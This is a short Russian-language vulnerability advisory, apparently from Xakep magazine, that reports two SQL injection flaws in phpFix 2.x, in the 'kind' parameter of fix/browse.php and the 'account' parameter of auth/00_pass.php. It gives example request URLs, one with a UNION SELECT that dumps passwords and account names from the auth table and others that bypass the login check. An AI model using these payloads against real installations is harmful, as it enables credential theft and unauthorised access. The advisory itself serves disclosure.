Хакер #305. Многошаговые SQL-инъекции
Программа: phpFix 2.x
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения.
1) Уязвимость существует из-за недостаточной обработки входных данных в
параметре "kind" сценарием fix/browse.php. Удаленный пользователь может с
помощью специально сформированного запроса выполнить произвольные SQL команды в
базе данных приложения.
Пример:
http://localhost/phpfix/fix/browse.php?kind=-99+union+
select+0,passwd,account,3,4,5,6,7,8,9,10,11+from+auth
2) Уязвимость существует из-за недостаточной обработки входных данных в
параметре "account" сценарием auth/00_pass.php. Удаленный пользователь может с
помощью специально сформированного запроса выполнить произвольные SQL команды в
базе данных приложения.
Пример:
http://localhost/phpfix/auth/00_pass.php?passwd=blah& account='+or+account+like+'blah%
// for login account
http://localhost/phpfix/auth/00_pass.php?passwd=blah& account='+or+passwd+like+'blah%
// for login password